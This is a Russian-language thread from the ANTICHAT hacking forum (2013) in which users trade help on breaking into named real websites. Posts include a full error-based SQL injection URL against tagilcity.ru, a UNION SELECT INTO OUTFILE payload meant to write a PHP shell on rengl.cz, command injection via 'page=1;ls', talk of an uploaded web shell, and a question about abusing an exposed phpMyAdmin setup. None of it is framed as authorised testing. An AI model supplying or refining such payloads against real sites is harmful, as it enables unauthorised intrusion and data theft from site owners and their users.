ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
20.01.2013, 14:33
|
|
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
Провел на форуме:
124363
Репутация:
11
|
|
помогите раскрутить,что то не получается
инъекция в заголовке в x-forwarded-for: 1'"
Код:
http://drive.s13.ru/?id=1
а то чё то туплю. |
|
|
20.01.2013, 22:10
|
|
Познающий
Регистрация: 19.05.2012
Сообщений: 98
Провел на форуме:
34457
Репутация:
-10
|
|
Залил shell на форум,открыл но там такая ситуация.
http://savepic.org/2581219.png
права на загрузку есть в папку tmp мона ли как-то оттуда потом открыть shell ? спасибо.
|
|
|
|
20.01.2013, 22:15
|
|
Участник форума
Регистрация: 29.09.2012
Сообщений: 233
Провел на форуме:
46989
Репутация:
20
|
|
Помогите плиз, есть сайт при запросе page=1;ls отображает содержимое текущей директории, а вот при запросах с пробелами на пример page=1;ls -lha ничего не отображает.
|
|
|
|
21.01.2013, 00:48
|
|
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
Провел на форуме:
124363
Репутация:
11
|
|
Сообщение от Vip77
Помогите плиз, есть сайт при запросе page=1;ls отображает содержимое текущей директории, а вот при запросах с пробелами на пример page=1;ls -lha ничего не отображает.
пробуй так
|
|
|
|
21.01.2013, 03:03
|
|
Участник форума
Регистрация: 29.04.2012
Сообщений: 110
Провел на форуме:
41100
Репутация:
1
|
|
Запрос:
Код:
http://www.rengl.cz/ceniky/mesto.php?id=-119'+union+select+1,'',3,4,5,6,7,8,9,10 INTO OUTFILE '/srv/http/adent.cz/rengl.cz/1.php' --+
Результат (файл rengl.cz/1.php не создается):
Код:
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /srv/http/adent.cz/rengl.cz/ceniky/mesto.php on line 37
Почему? |
|
|
|
21.01.2013, 03:51
|
|
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
Провел на форуме:
124363
Репутация:
11
|
|
в HEX переведи попробуй.
Может ещё быть что прав нет на корневую папку,ищи врайтабельную.
|
|
|
|
21.01.2013, 09:39
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от Faaax
в HEX переведи попробуй.
Да что вы говорите ? И из hex код исполнится ? Бред !!
можно и нужно урезать до
Попробуй.
|
|
|
|
21.01.2013, 16:02
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
Провел на форуме:
107835
Репутация:
23
|
|
Есть скуля, раскрутить не знаю как
_http://tagilcity.ru/component/option,com_fireboard/func,fbprofile/task,showprf'/?option=com_fireboard&func=showcat&Go=%25D0%2598%2 5D0%25B4%25D1%2582%25D0%25B8&catid=171
|
|
|
|
21.01.2013, 20:43
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от er9j6@
Есть скуля, раскрутить не знаю как
_http://tagilcity.ru/component/option,com_fireboard/func,fbprofile/task,showprf'/?option=com_fireboard&func=showcat&Go=%25D0%2598%2 5D0%25B4%25D1%2582%25D0%25B8&catid=171
Код:
http://tagilcity.ru/index.php?option=com_fireboard'+AND+(SELECT+4662+FROM(SELECT+COUNT(*),CONCAT(0x7e414e5449434841547e,(SELECT(CASE+WHEN+(4662=4662)+THEN+version()+ELSE+0+END)),0x7e414e5449434841547e,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)+AND+'RGKx'='RGKx&func=fbprofile&task=showprf
Найденную Вами SQL инъекцию можно сократить, т.к. запрос один и тот же, только вот первая его часть представлена как ЧПУ, а вторам с GET параметрами, собственно реализацию которой я Вам и продемонстрировал.
|
|
|
|
21.01.2013, 23:11
|
|
Новичок
Регистрация: 27.06.2011
Сообщений: 8
Провел на форуме:
2956
Репутация:
0
|
|
Имеется доступ в site/mysql/scripts/setup.php. pma 2.11.11.3. Как получить доступ к бд ?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Комбинированный вид
